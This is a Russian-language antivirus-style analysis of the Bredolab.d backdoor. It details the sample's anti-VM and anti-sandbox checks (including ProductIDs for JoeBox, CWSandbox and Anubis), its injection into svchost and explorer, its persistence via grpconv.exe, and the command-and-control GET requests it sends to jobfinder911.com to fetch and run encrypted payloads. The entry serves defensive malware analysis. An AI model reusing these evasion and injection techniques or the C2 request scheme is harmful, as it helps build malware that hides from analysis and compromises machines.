Backdoor.Win32. Bredolab.d

Вредоносная программа, предназначенная для скрытого удалённого управления злоумышленником пораженным компьютером.

Деструктивная активность

Проверяет наличие файлов %System%\drivers\hgfs.sys, %System%\drivers\prleth.sys, %System%\drivers\vmhgfs.sys, наличие библиотек dbghelp.dll, sbiedll.dll в своем адресном пространстве. В случае обнаружения завершается.

Проверяет ключ реестра:

HKLM\HARDWARE\Description\System\SystemBiosVersion, в этом значении ищет вхождение строки «VBOX», в случае обнаружения завершается.

Чтобы исключить возможность исполнения себя в SandBox, проверяет несоответствие:

* Имя пользователя — CurrentUser, Sandbox;

* Имя компьютера — SANDBOX;

* Имя пользователя — user и имя пользователя — USER;

* Значения ключа ProductID в HKLM\Microsoft\Windows\CurrentVersion:

o 55274-640-2673064-23950 (JoeBox)

o 76487-644-3177037-23510 (CWSandbox)

o 76487-337-8429955-22614 (Anubis)

Проверяет имя, соответствующее запускаемому файлу:

* Если имя grpconv.exe, проверяет наличие в системе процесса cfp.exe. В случае обнаружения перемещает себя в %Temp%\~TM%TempName%, завершается. В противном случае создает новый процесс svchost.exe, инжектит в него свою часть, запускает в нем новый поток, завершается.

* Если имя explorer.exe, проверяет наличие файла %Temp%\~TM27FB4A.TMP, если находит, то в HKCU\SoftWare\Microsoft\WindowsNT\CurrentVersion\Winlogon устанавливает значение ключа RunGrpCon в 1, перемещает

      %Temp%\~TM27FB4A.TMP в %System%\Wbem\grpconv.exe, устанавливает у
      %System%\Wbem\grpconv.exe атрибуты времени такие же как у
      %System%\smss.exe, удаляет файлы %System%\grpconv.exe,
      %System%\dllcache\grpconv.exe.
      Создает мьютекс с именем _SYSTEM_4D2EF3A_.
      Создает новый процесс svchost.exe, инжектит в него свою часть, запускает в нем новый поток, завершается.

* В случае произвольного имени, проверяет наличие в системе процесса cfp.exe. В случае обнаружения перемещает себя в %Temp%\~TM%TempName%, завершается. В противном случае копирует себя в %Temp%\~TM27FB4A.TMP, инжектит себя в explorer.exe, запускает в нем новый поток, перемещает себя в %Temp%\~TM%TempName%, завершается.

Во всех случаях осуществляет проверку соответствия загруженных в свое адресное пространство модулей kernel.dll и ntdll.dll с файлами-образами на диске в %System%. В kernel32.dll проверяет корректность функций CreateRemoteThread, WriteProcessMemory, VirtualProtectEx, VirtualAllocEx, в ntdll.dll функций — ZwAllocateVirtualMemory, ZwWriteVirtualMemory, ZwProtectVirtualMemory, ZwCreateThread, ZwAdjustPrivelegesToken, ZwOpenProcess, ZwOpenThread, ZwQueueApcThread и автоматически производит корректировку при несоответствии (anti-sandbox).

Работа svchost.exe:

Производится циклическая попытка подключения к jobfinder911.com.

При удачном подключении отправляется GET-запрос:

GET /l/controller.php?action=bot&entity_list={числа через запятую}
&uid=11&first={0|1}&guid={VolumeSerialNumber}&rnd=6293712

На основании полученного содержимого и значения поля Magic-Number, в котором хранится длина ключа и значение самого ключа, происходит расшифровка данных, которые могут записываться либо в новый файл

%Windows%\Temp\wpv%rand_number%.exe, с дальнейшим запуском файла, либо данные записываются в новый создаваемый процесс svchost (для этого случая установлен перехватчик функции ZwResumeThread из ntdll.dll, осуществляющий запись зловреда — функция вызывается из используемой CreateProcess).

Второй GET-запрос вида:

GET /l/controller.php?action=report&guid=0&rnd=6293712&uid=11&
entity={число:unique_start|unique_failed|repeat_start|repeat_failed;число:...}

Осуществляется запись служебной информации в %APPDATA%\wiaserva.log.